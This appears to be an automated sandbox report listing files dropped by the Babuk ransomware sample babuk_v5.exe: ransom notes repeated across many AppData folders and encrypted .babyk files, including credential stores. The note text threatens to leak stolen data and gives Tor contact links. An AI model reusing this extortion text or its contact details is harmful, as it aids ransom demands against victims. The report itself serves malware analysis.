                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Adobe\LogTransport2\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\AddIns\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Credentials\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Excel\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\MMC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.636153360637957
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlwRjlaKoQiib7JWvNU6+zIHKAWHUMZ31AIISmlvFEGwKXllO9UxNvEEn:AFlaKkib7+5+cHCb31XRGvFqK1lO90vt
                                                                            MD5:9C5BB3EB98AB043F2F2E0E7E5CB8C71C
                                                                            SHA1:78A95CFCD0B2DBF6A451326C1583D2FA45D6FE7B
                                                                            SHA-256:6C0E8F272C86BCCCF08BE1B77E97F27C056B8210500DDCD9A1D45303FABE6E9C
                                                                            SHA-512:13137292E02D4B59765494E8C86349D642A67DB3C254023B52BE3C030DDFFE89A4BE177303F4631895B7B3E729B4F0482969816D71F239C6FE072DFECCDCBE74
                                                                            Malicious:false
                                                                            Preview: .....`.F|>.......E.(+(.G...)...o...8r....~....*.._..6.5ks..b/e.`.M..KZ...o.1{I..{.....0...}A,....Hy1.?zn_...;......t...@..h2....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Network\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):480
                                                                            Entropy (8bit):7.494683228428951
                                                                            Encrypted:false
                                                                            SSDEEP:12:MKR3sHcVHybFD/N5SOxGU4qoeBhgfn4/rYM4aZ:MKRWcVHybFrNF4iBhgQ8K
                                                                            MD5:627B708265AA024FCEECEEAAFC8C068D
                                                                            SHA1:66D16AFC62BD2D4584392626CC107F509673B5D8
                                                                            SHA-256:D5CB780EE4385CF2DFD4176E2E81313A80EA0C68A6EC67E806B62C0AF9CD36CE
                                                                            SHA-512:5C3A6CFB912498D5F479546393F9EFF9820CBABC81627A38EFCF485B5EBD101FF0E3C818EB99FBB62EA51E08FF1FCD866D42905891E162EDC15C4DBDA7E161D4
                                                                            Malicious:false
                                                                            Preview: ...4<.1...6.N?w.,$..s.z..i....QB.N..l.Kqb..Q.c2B1.J.o......0....o.^.&9{C}.3"........El.Y#........i{.....wm...Q1.Z.....Y..M...G."...Ln.RU..BL.....V?..|.z*....P.%Do..+.........r....GA ?(.......\[n..Z...C......g/.q|...S..o..<..)...j.*]!}..=... Z...O.HW.....K.`v........3.u.N..Sw..#jn&.t?F.N3..D..4..{.....KU^Z...n...A......0.l&u$...6.p......S....+...0.n3...C....H|..Ap..H..<JGai..}t.4...R.Y .e..4.7.00...t.......-.j.A.....a......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\0e0e67a2-dcf2-484a-95b2-8e3e695898c0.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):636
                                                                            Entropy (8bit):7.681792599956301
                                                                            Encrypted:false
                                                                            SSDEEP:12:Tb06au1SPnBjZUK3h4d/QRzQIw1jSO1KxyeFtb0IAM1RJ:TRh0Pvf1RzQI0jSOoxyeLbMM1RJ
                                                                            MD5:028740CB10DF186C7D890412A4BF59F0
                                                                            SHA1:CA111F43D620134C5433E8BF508AD09C6720991C
                                                                            SHA-256:ED181C84EF09259DF67B9055908E6BB121CE2CF0705339A81C78FCE6BE762320
                                                                            SHA-512:A315F6E432AA40D918B3D9C9F16F37A4A36FC5BD26153036540F5CA9A33EA32F5479EEEBEFBB0203C160F717A84F332B1B4699667A7B313529BF94413CD51050
                                                                            Malicious:false
                                                                            Preview: .S.....7..5q.Z......=...Y..-.h7u....?4[....@..z.._"ma....?x........nC...&:-..,....PN..>...mn..Y.&`.N..L..#po.Au.l.<.J..s..R..z..u...E.m7.........Nr...N....W8bF......La'*...<....0..5....|..i?..o_\...H#~I....E.w........p3.....@n.....4...1..|.;.{q.z..J.G.3I..E8.~".!..(.?ih.......86...9"i.L&..,.PLA:...CT9.OG....h-.u..L...D;.6........Q...r.........[K..b.[.....)-..E.wA..DV.3:\P"...l.d...k.<Fy....x......GT?._..,...P.....p..$.)B%..3..G.pu6...V....U..!........U....w..u..V......<K.........H....T.s~f../.....x....M.....~<.z.J...P.......za._`l."..b3......)..-.X..D.Z..|U%.[x....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\4f40f935-563c-4960-82bf-9e9889ebd721.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):636
                                                                            Entropy (8bit):7.646338514783773
                                                                            Encrypted:false
                                                                            SSDEEP:12:aaPf4dbfOJlyaDBXRyegTff/H5hVVWhjcXQTLs0rSOOreQYfWrl8R:aa34dbfOTyalXRyDfRVNXAA7redsA
                                                                            MD5:4B3DBCC2D087C4CDB7B2FCDBB3624CED
                                                                            SHA1:90A4206231EBD61FE0107AF07D835CFC0894B265
                                                                            SHA-256:1532B3A965C7D29300DC48DE671E3B86AB0196249B1ECEA1F28B2BC1A83F5BB6
                                                                            SHA-512:6A54889DA0F9F9FADB26C84065D70DDAD8E4C1C9B0347F19F22BE75429CB6ED8235643B295F28C16CB5D6CEF435D4BCC40BFE643430F6066140C78B6C45C8972
                                                                            Malicious:false
                                                                            Preview: .G%.J..%x....<.......t..1'^.Z.1.{D..>...=5......0.U.k...G.~.v.<L79.4.U"..:...P.Aw./...;.\&V.h..9.y..f ....hO.....q.jI.1...n+.w......h..q......G..cc..2.W=.>.W.H.Z.C....uk....&..~j.......}..i.....L&WuuRQ..]....0..~...a......u..s.OB#0...........DID........niY...O......4....8Nf..^...Cp..I...eXe!.q;`._...=w....Z..(9.7..&.S qLN.&.c........p..%?S...t.s....44..T..g...$.3..!J@.... kRk\.....&.;..%...(.YZ..b..._.7.Q...6.;...d...d.H...7.l?.0~. ....@.....4TYn...R..fx|..=y4=.-.....A...../..".....,.p...f]...].f.R..W_..*.T..9.y...`.P>k..'+.E.0G+D.I4........>Nm....S....)...@.v.9....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\How To Restore Your Files.txt
